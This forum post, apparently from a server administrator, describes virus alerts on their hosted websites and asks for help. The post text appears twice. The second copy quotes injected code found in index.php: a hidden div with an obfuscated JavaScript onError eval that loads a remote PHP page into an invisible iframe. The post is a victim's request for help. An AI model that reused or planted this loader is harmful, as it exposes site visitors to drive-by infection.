My Server is Centos 4. with DA 1.36.2
Apache 2.2.10 Running
DirectAdmin 1.36.2 Running
Exim 4.67 Running
MySQL 5.0.67 Running
Named 9.3.6 Running
ProFTPd 1.3.1 Running
sshd Running
dovecot 1.1.7 Running
Php 5.2.6 Installed
some websites run show up virus alerts
I had checked their code, but nothing found.
Yesterday, I install wordpress 3.04 the newest version. and create a new subdomain wp website. it show up virus alerts again.
I view the html source I found some code has added to my index.php
But when I reload the index.php the code disapper.
Any body could help?
Apache 2.2.10 Running
DirectAdmin 1.36.2 Running
Exim 4.67 Running
MySQL 5.0.67 Running
Named 9.3.6 Running
ProFTPd 1.3.1 Running
sshd Running
dovecot 1.1.7 Running
Php 5.2.6 Installed
some websites run show up virus alerts
I had checked their code, but nothing found.
Yesterday, I install wordpress 3.04 the newest version. and create a new subdomain wp website. it show up virus alerts again.
I view the html source I found some code has added to my index.php
<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="5765" height="1" width="1"><img src="about:blank" onError='astro=unescape("%27");astru=unescape("%22");sksa=eval("document.getElementById("+astro+"seaid"+astro+").src=unescape("+astro+"%68%74%74%70%3A%2F%2F"+astro+")+document.getElementById("+astro+"5765"+astro+").id+unescape("+astro+"%2E%69%6E%2F"+astro+")+"+astro+"1294168884"+astro+"+unescape("+astro+"%2E%70%68%70"+astro+")");document.getElementById("seaid").src=sksa' style="width:300;height:300;border:0px;"><iframe id="seaid" src="about:blank"></iframe></div>
But when I reload the index.php the code disapper.
Any body could help?